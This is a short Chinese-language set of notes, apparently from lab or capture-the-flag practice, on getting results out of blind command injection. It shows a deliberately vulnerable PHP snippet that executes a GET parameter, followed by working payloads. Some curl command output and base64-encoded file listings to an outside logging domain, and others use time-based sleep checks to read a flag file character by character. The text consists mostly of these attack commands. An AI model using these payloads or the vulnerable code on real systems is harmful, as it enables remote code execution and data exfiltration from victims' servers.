存在命令执行,但是不会直接回显,所以需要特殊的指令把结果带出来。
<?php
$cmd = $_GET[`cmd`];
`$cmd`;
1.ceye.io
需要注册个账号,然后会给你分配个域名
访问:
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`whoami`
执行的结果
http://snrkgl.ceye.io/www-data(用户名www-data)
其他情况:
# ls -sl
执行:
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al`
结果:
http://snrkgl.ceye.io/total
看起来只能带出第一行,所以我们需要sed命令
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al | sed -n '2p'`
结果:
http://snrkgl.ceye.io/drwxr-xr-x
发现空格不能被带出来,用base64编码
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al | sed -n '2p'|base64`
结果:
http://snrkgl.ceye.io/ZHJ3eHIteHIteCAyIHJvb3Qgcm9vdCA0MDk2IERlYyAyNyAxNDo1OSAuCg==
解码:drwxr-xr-x 2 root root 4096 Dec 27 14:59 .
若有的时候长度太大,cut来分割字符(第一个字符下标为1)
http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al |cut -c 3-10`
2.反弹shell,不多bb
3.sleep
#请注意空格,测试环境ubuntu server 16.04
http://106.13.124.93/test.php?cmd=?cmd=if [ 1 == 1 ];then sleep 2;fi
http://106.13.124.93/test.php?cmd=?cmd=if [ 1 == 2 ];then sleep 2;fi
#请注意空格
http://106.13.124.93/test.php?cmd=if [ $( whoami | cut -c 1) = 'w' ];then sleep 2;fi
http://106.13.124.93/test.php?cmd=if [ $( whoami | cut -c 1) = 'r' ];then sleep 2;fi
#注意空格
http://106.13.124.93/test.php?cmd=if [ $( cat flag | cut -c 1) = '1' ];then sleep 2;fi
http://106.13.124.93/test.php?cmd=if [ $( cat flag | cut -c 1) = '2' ];then sleep 2;fi